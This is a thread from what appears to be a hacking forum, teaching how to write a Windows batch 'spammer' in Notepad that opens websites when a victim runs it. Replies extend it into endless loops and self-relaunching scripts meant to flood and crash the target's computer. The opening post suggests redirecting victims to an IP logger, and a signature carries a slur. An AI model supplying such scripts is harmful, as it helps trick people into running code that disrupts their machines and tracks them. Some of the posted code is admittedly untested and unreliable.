Login Register






How to make a Spammer with Notepad. filter_list
Author
Message
How to make a Spammer with Notepad. #1
This will make someone go to google.com when opened. You can change google.com with anyother website. You could also do this to re-direct to say a Java Drive ip logger... etc.
Step's on how to make this.


Open notepad
and Type Start
Example
Code:
START http://www.google.com

Which you can just say Start which will just open CMD.

But if you put a website name it will open it to the website.
You can also start a program like chrome.exe

After doings click File - Save as - Whatever.bat
Simple then get your friend or whoever to run the program there you go.

Any questions ask.


*This is really basic and just a fun prank.


[Image: xlbdwZT.png]

Reply

RE: How to make a Spammer with Notepad. #2
Can also be reworked to flood the computer, possibly forcing a crash(or simply be annoying, at the least).

Code:
:start start http://www.google.com goto start

or

Code:
:start start http://www.google.com ping 192.0.2.2 -n 1 -w 10000 > nul goto start

the line

Code:
ping 192.0.2.2 -n 1 -w 10000 > nul

is used to delay the script, making crashes less likely.
You can alter the wait time by changing the "10000". It's in milliseconds, so be sure to multiply the number of seconds you want it to wait by 1000.

NOTE: This is completely untested, and I'm pretty shit at batch scripting.
If I've done something wrong here, I'd really love it if you'd correct me. Misinformation is a terrible thing.
[Image: tumblr_m73y8go3jd1rb7u8co1_500.gif]
Avatars are for faggots.

Reply

RE: How to make a Spammer with Notepad. #3
You added the : In front of start take it away runs fine for me. Smile
[Image: xlbdwZT.png]

Reply

RE: How to make a Spammer with Notepad. #4
Why not loop through the whole thing? (I have not tested this)

Code:
@echo off start http://www.google.com start thisprogramname.bat exit

Cool

Reply

RE: How to make a Spammer with Notepad. #5
That'd be dependent on the target not renaming it.
[Image: tumblr_m73y8go3jd1rb7u8co1_500.gif]
Avatars are for faggots.

Reply

RE: How to make a Spammer with Notepad. #6
Im pretty sure you should use "How to make a Spammer with Batch" Smile
[Image: tumblr_m4vms28lYu1qj3ir1.gif]

Reply

RE: How to make a Spammer with Notepad. #7
Well I released it in command line programming. But it's batch yes but it's made wif notepad. Smile
[Image: xlbdwZT.png]

Reply

RE: How to make a Spammer with Notepad. #8
There's a grammatical error in your post.

Quote:you're

Should be:
Code:
your

Hope this helps.
[Image: F4Z9Dqw.png]

Reply

RE: How to make a Spammer with Notepad. #9
Why not just spam opening of CMD's? You don't have to wait for a page to load and it takes up the screen and crashes the computer quickly Biggrin

Reply

RE: How to make a Spammer with Notepad. #10
(07-12-2013, 10:41 PM)Xanii Wrote: Why not just spam opening of CMD's? You don't have to wait for a page to load and it takes up the screen and crashes the computer quickly Biggrin

You could do that. I just simply did that as an example.
[Image: xlbdwZT.png]

Reply